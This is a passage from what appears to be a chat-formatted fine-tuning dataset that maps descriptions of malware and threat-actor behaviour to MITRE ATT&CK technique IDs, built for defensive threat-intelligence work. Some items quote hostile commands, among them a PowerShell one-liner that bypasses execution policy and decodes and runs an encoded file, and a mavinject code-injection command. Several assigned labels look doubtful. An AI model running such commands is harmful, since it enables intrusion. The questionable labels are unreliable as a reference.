- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments."
- },
- {
- "role": "assistant",
- "content": "T1592.004 - Client Configurations"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures screenshots of the infected system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has used BITS jobs to download malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "allows adversaries to search for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini)))); PowerShell one-liner Encoded text file Execution flow: The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In my opinion enumeration is not an attack technique that blue teamers should focus their defense efforts on. The best way to prevent unauthorized users from accessing this information is by having strict conditional access policies which govern how and from where users are allowed to use their Azure AD credentials. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here. I haven’t personally looked into bypassing this or if other functionality in Azure breaks if you enable this"
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spreadsheet’s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skip to main content . We use optional cookies to improve your experience on our websites, such as through social media connections, and to display personalized advertising based on your online activity. If you reject optional cookies, only cookies necessary to provide you the services will be used. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations. Check the syntax and parameters for each operation to verify that they can be used on remote computers . In this article"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The server uses folders in the current directory to store information sent and received from WellMess backdoors and the folder layout is shown in Figure 2. Additionally, the server uses a private key and certificate located in the current working directory during mutual TLS connections"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask creates a scheduled task called “WinUpdate” to re-establish any dropped C2 connections."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris can use HTTP to establish C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has the ability to identify the users on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent has the ability to add bytes to change the file hash."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has accessed and collected credentials from password managers."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has created scheduled tasks using name variants such as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\", to launch Maze at a specific time."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\" /c mavinject.exe 568 /injectrunning c:\\Drivers\\DriverGFY.db\""
- },
- {
- "role": "assistant",
- "content": "T1218.013 - Mavinject"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can obtain a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies processes and collects the process ids."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver has the ability to manipulate user tokens on targeted Windows systems."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses RC4 encryption to obfuscate HTTP traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used macros in s as well as executed VBScripts on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers."
- },
- {
- "role": "assistant",
- "content": "T1048.002 - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CoinTicker initially downloads a hidden encoded file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to run an application (\"CreateProcessW\") or script/file (\"ShellExecuteW\") via API."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can track key presses with a keylogger module."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: Listing files in directory Creating arbitrary processes Writing data received from control servers to files on disk Gathering information for all drives Gathering process times for all processes Sending the contents of a specific file to the control server Wiping and deleting files on disk Setting the current working directory for the implant Sending disk space information to the control server - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1057 - Process Discovery', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBALL, initially discovered in an attack during October 2019, is a simple FTP downloader utility which facilitates the installation of SYSCON, a full-featured Remote Access Trojan (RAT) which leverages FTP for Command and Control (C2). It was found embedded in a malicious Word document sent as a phishing lure to a US government agency and two non-US foreign nationals professionally associated with North Korea."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of an initial reconnaissance document allows Inception to profile the target’s computer and potentially customize any subsequent malicious document to exploit known vulnerabilities in unpatched software on the computer"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEXTMATE executes cmd.exe to provide a reverse shell to adversaries."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C2 server will respond to the HTTP requests to the “bat&m=d” URL with a batch script that update.vbs will save to the “dn” folder and execute. The output of the downloaded batch script is saved to a text file in the “up” folder and uploaded to the C2 server via an HTTP POST request to the following URL"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Psylo has a command to download a file to the system from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can execute through the \"WinExec\" API."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An HTTP malware variant decrypts strings using single-byte XOR keys."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has attempted to lure victims into opening e-mail attachments to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To deliver the malware to the victim machines, the Rocke group exploits vulnerabilities in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion. For example, by exploiting Oracle WebLogic vulnerability CVE-2017-10271 in Linux shown in Figure 1, a compromised Linux victim machine downloads backdoor 0720.bin and opens a shell"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can list files on available disk volumes."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Much like the known actors Miniduke or CommentCrew, it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT steals files based on an extension list if a USB drive is connected to the system."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Starting from August 2020, Pawn Storm has sent several spear phishing emails with a malicious RAR attachment. Among the earliest samples we received were two almost identical RAR files that contained a file called info.exe"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JSS Loader can download and execute VBScript files."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can load a DLL using ."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decrypts and extracts a copy of its main DLL payload when executing."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has been known to establish persistence by adding programs to the Run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie establishes persistence via a .lnk file in the victim’s startup path."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: + + “?supportTeamDrives=true&fields=modifiedTime” The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \\”modifiedTime\\”:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1074 - Data Staged', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each of the Silent Librarian lures ends with a very realistic looking closing signature containing contact information for the target library. This information is collected through open source research conducted by the threat actors. In some cases, all of the contact information can be found together on one webpage; however, some of the information is in different locations, indicating the actors are likely performing manual reconnaissance to gather the information"
- },
- {
- "role": "assistant",
- "content": "T1594 - Search Victim-Owned Websites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can obtain the OS version and build, computer name, and processor architecture from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used cloud services, including OneDrive, for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee uses a batch file to load a DLL into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar encodes communications to the C2 server in Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used base64 to encode command and control traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth has a command to timestop a file or directory."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used AOL Instant Messenger for C2."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DriveSlayer is digitally signed using a valid certificate and also abuses a legitimate EaseUS Partition Master driver to gain raw disk access and manipulate the disk to make the system inoperable"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as \"Google Defender\" \"Google Email Protection,\" and \"Google Scanner\" for Gmail users. They also targeted Yahoo users with applications masquerading as \"Delivery Service\" and \"McAfee Email Protection\"."
- },
- {
- "role": "assistant",
- "content": "T1528 - Steal Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has relied on a user to click a malicious link within a spearphishing email."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
